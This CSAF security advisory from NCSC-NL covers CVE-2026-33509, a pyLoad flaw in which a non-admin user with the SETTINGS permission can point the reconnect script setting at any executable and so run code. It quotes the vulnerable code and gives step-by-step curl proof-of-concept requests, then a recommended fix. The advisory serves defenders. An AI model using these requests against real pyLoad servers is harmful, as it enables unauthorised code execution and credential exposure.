{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33509", "tracking": { "current_release_date": "2026-03-29T12:31:11.859911Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33509", "initial_release_date": "2026-03-20T22:41:55.973605Z", "revision_history": [ { "date": "2026-03-20T22:41:55.973605Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-20T22:42:06.500272Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-24T20:53:53.064326Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)." }, { "date": "2026-03-24T20:53:57.281142Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:55:50.341713Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-24T20:55:59.222871Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:50:13.998289Z", "number": "7", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-26T00:50:17.406188Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-26T20:39:10.097010Z", "number": "9", "summary": "Unknown change." }, { "date": "2026-03-26T20:39:12.627798Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-26T21:25:26.346155Z", "number": "11", "summary": "Products created (1).| Product Identifiers created (2).| Products connected (1).| Exploits created (1)." }, { "date": "2026-03-26T21:25:29.200303Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:58:00.867611Z", "number": "13", "summary": "References created (1)." }, { "date": "2026-03-28T07:58:05.047375Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-03-28T08:10:53.265956Z", "number": "15", "summary": "References removed (1)." }, { "date": "2026-03-29T01:16:29.161379Z", "number": "16", "summary": "References created (1)." }, { "date": "2026-03-29T12:30:07.755421Z", "number": "17", "summary": "NCSC Score updated." } ], "status": "interim", "version": "17" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0.4.0|<0.5.0b3.dev97", "product": { "name": "vers:unknown/>=0.4.0|<0.5.0b3.dev97", "product_id": "CSAFPID-5902872" } }, { "category": "product_version_range", "name": "vers:unknown/>=0.4|<=0.4.20", "product": { "name": "vers:unknown/>=0.4|<=0.4.20", "product_id": "CSAFPID-5919261", "product_identification_helper": { "cpe": "cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "pyload" } ], "category": "vendor", "name": "pyload" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0.5.0a5.dev528|<0.5.0b3.dev97", "product": { "name": "vers:unknown/>=0.5.0a5.dev528|<0.5.0b3.dev97", "product_id": "CSAFPID-5919021", "product_identification_helper": { "cpe": "cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*" } } } ], "category": "product_name", "name": "pyload-ng" } ], "category": "vendor", "name": "pyload-ng_project" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33509", "notes": [ { "category": "description", "text": "## Summary\n\nThe `set_config_value()` API endpoint allows users with the non-admin `SETTINGS` permission to modify any configuration option without restriction. The `reconnect.script` config option controls a file path that is passed directly to `subprocess.run()` in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in `set_config_value()` is a hardcoded check for `general.storage_folder` — all other security-critical settings including `reconnect.script` are writable without any allowlist or path restriction.\n\n## Details\n\nThe vulnerability chain spans two components:\n\n**1. Unrestricted config write — `src/pyload/core/api/__init__.py:210-243`**\n\n```python\n@permission(Perms.SETTINGS)\n@post\ndef set_config_value(self, category: str, option: str, value: Any, section: str = \"core\") -> None:\n self.pyload.addon_manager.dispatch_event(\n \"config_changed\", category, option, value, section\n )\n if section == \"core\":\n if category == \"general\" and option == \"storage_folder\":\n # Forbid setting the download folder inside dangerous locations\n # ... validation only for storage_folder ...\n return\n\n self.pyload.config.set(category, option, value) # No validation for any other option\n```\n\nThe `Perms.SETTINGS` permission (value 128) is a non-admin permission flag. The only hardcoded validation is for `general.storage_folder`. The `reconnect.script` option is written directly to config with no path validation, allowlist, or sanitization.\n\n**2. Arbitrary script execution — `src/pyload/core/managers/thread_manager.py:157-199`**\n\n```python\ndef try_reconnect(self):\n if not (\n self.pyload.config.get(\"reconnect\", \"enabled\")\n and self.pyload.api.is_time_reconnect()\n ):\n return False\n\n # ... checks if active downloads want reconnect ...\n\n reconnect_script = self.pyload.config.get(\"reconnect\", \"script\")\n if not os.path.isfile(reconnect_script):\n self.pyload.config.set(\"reconnect\", \"enabled\", False)\n self.pyload.log.warning(self._(\"Reconnect script not found!\"))\n return\n\n # ... reconnect logic ...\n\n try:\n subprocess.run(reconnect_script) # Executes attacker-controlled path\n except Exception:\n # ...\n```\n\nThe `reconnect_script` value comes directly from config. The only check is `os.path.isfile()` — the file must exist but there is no allowlist, no path restriction, and no signature verification.\n\n**3. Attacker also controls timing via same SETTINGS permission**\n\nThe attacker can set `reconnect.enabled=True`, `reconnect.start_time`, and `reconnect.end_time` through the same `set_config_value()` endpoint to control when execution occurs. `toggle_reconnect()` at line 321 requires only `Perms.STATUS` — an even lower privilege.\n\n**4. Additional privilege escalation via config access**\n\nBeyond RCE, the same unrestricted config write allows SETTINGS users to:\n- Read proxy credentials (`proxy.username`/`proxy.password`) in plaintext via `get_config()`\n- Redirect syslog to an attacker-controlled server (`log.syslog_host`/`log.syslog_port`)\n- Disable SSL (`webui.use_ssl=False`), rebind to `0.0.0.0` (`webui.host`)\n- Modify SSL certificate/key paths to enable MITM\n\n## PoC\n\n**Step 1: Set reconnect script to an attacker-controlled executable**\n\nVia API:\n```bash\n# Authenticate and get session (as user with SETTINGS permission)\ncurl -c cookies.txt -X POST 'http://target:8000/api/login' \\\n -d 'username=settingsuser&password=pass123'\n\n# Set reconnect script to a known executable on the system\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=script&value=/tmp/exploit.sh§ion=core'\n```\n\nVia Web UI:\n```bash\ncurl -b cookies.txt -X POST 'http://target:8000/json/save_config?category=core' \\\n -d 'reconnect|script=/tmp/exploit.sh&reconnect|enabled=True'\n```\n\n**Step 2: Enable reconnect and set timing window**\n\n```bash\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=enabled&value=True§ion=core'\n\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=start_time&value=00:00§ion=core'\n\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=end_time&value=23:59§ion=core'\n```\n\n**Step 3: Script executes when thread manager calls `try_reconnect()`**\n\nThe thread manager's `run()` method (called repeatedly by the core loop) invokes `try_reconnect()`, which calls `subprocess.run(reconnect_script)` at `thread_manager.py:199`.\n\n**Note on exploitation constraints:** The file at the target path must exist (`os.path.isfile()` check) and be executable. With `shell=False` (subprocess.run default), no arguments are passed. If the attacker also has `ADD` permission (common for non-admin users), they can use pyLoad to download an archive containing an executable script, which may retain execute permissions after extraction.\n\n## Impact\n\n- **Remote Code Execution**: A non-admin user with SETTINGS permission can execute arbitrary programs on the server as the pyLoad process user\n- **Privilege escalation**: The SETTINGS permission is described as \"can access settings\" — granting it is not expected to grant arbitrary code execution capability\n- **Credential exposure**: SETTINGS users can read proxy credentials, SSL key paths, and other sensitive config values via `get_config()`\n- **Network reconfiguration**: SETTINGS users can disable SSL, change bind address, redirect logging, and modify other security-critical network settings\n\n## Recommended Fix\n\nAdd an allowlist or category-level restriction in `set_config_value()` that prevents non-admin users from modifying security-critical options:\n\n```python\n# In set_config_value(), after the storage_folder check:\nADMIN_ONLY_OPTIONS = {\n (\"reconnect\", \"script\"),\n (\"webui\", \"host\"),\n (\"webui\", \"use_ssl\"),\n (\"webui\", \"ssl_cert\"),\n (\"webui\", \"ssl_key\"),\n (\"log\", \"syslog_host\"),\n (\"log\", \"syslog_port\"),\n (\"proxy\", \"username\"),\n (\"proxy\", \"password\"),\n}\n\nif section == \"core\" and (category, option) in ADMIN_ONLY_OPTIONS:\n # Require ADMIN role for security-critical settings\n if not self.pyload.api.user_data.get(\"role\") == Role.ADMIN:\n raise PermissionError(f\"Admin role required to modify {category}.{option}\")\n```\n\nAdditionally, consider validating the `reconnect.script` path against an allowlist of directories or requiring admin approval for script path changes.", "title": "github - https://api.github.com/advisories/GHSA-r7mc-x6x7-cqxx" }, { "category": "description", "text": "pyLoad is a free and open-source download manager written in Python. From version 0.4.0 to before version 0.5.0b3.dev97, the set_config_value() API endpoint allows users with the non-admin SETTINGS permission to modify any configuration option without restriction. The reconnect.script config option controls a file path that is passed directly to subprocess.run() in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in set_config_value() is a hardcoded check for general.storage_folder — all other security-critical settings including reconnect.script are writable without any allowlist or path restriction. This issue has been patched in version 0.5.0b3.dev97.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33509" }, { "category": "description", "text": "pyLoad is a free and open-source download manager written in Python. From version 0.4.0 to before version 0.5.0b3.dev97, the set_config_value() API endpoint allows users with the non-admin SETTINGS permission to modify any configuration option without restriction. The reconnect.script config option controls a file path that is passed directly to subprocess.run() in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in set_config_value() is a hardcoded check for general.storage_folder — all other security-critical settings including reconnect.script are writable without any allowlist or path restriction. This issue has been patched in version 0.5.0b3.dev97.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33509.json" }, { "category": "other", "text": "0.00063", "title": "EPSS" }, { "category": "other", "text": "3.6", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, The value of the most recent EPSS score, Is related to an uncommon product vendor, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5902872", "CSAFPID-5919021", "CSAFPID-5919261" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-r7mc-x6x7-cqxx" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33509" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33509.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-r7mc-x6x7-cqxx" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5902872", "CSAFPID-5919021", "CSAFPID-5919261" ] } ], "title": "CVE-2026-33509" } ] }